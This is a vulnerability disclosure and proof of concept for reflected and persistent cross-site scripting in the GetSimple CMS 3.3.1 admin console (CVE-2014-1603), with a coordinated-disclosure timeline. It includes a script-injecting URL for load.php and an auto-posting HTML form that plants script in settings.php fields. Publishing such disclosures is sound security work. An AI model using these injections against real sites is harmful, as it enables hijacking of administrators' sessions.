PoC for XSS bugs in the admin console of GetSimple CMS 3.3.1
CVE-2014-1603
by Pedro Ribeiro (pedrib@gmail.com) from Agile Information Security

Timeline:
	04/11/2013 - Found bugs, produced proof of concept.
	05/11/2013 - Communicated to the developer, which acknowledged receipt.
	10/01/2014 - Politely asked the developer for progress, no response.
	17/01/2014 - Received CVE number from MITRE.
	20/01/2014 - Communicated CVE number to the developer, no response.
	29/01/2014 - Politely asked the developer for progress, no response.
	12/05/2014 - Public release.
==============================

Reflected XSS in plugin load page:
	http://192.168.56.101/getsimple/admin/load.php?id=anonymous_data&param="><script>alert(1)</script>

Persistent XSS in settings page:
	<form name="input" action="http://192.168.56.101/getsimple/admin/settings.php" method="post">
	<input type="text" name="user" value="&quot;&gt;&lt;script&gt;alert(1);&lt;/script&gt;">
	<input type="text" name="email" value="&quot;&gt;&lt;script&gt;alert(2);&lt;/script&gt;">
	<input type="text" name="name" value="&quot;&gt;&lt;script&gt;alert(3);&lt;/script&gt;">
	<input type="hidden" name="submitted" value="Save Settings">
	<input type="submit" value="Submit">
	</form>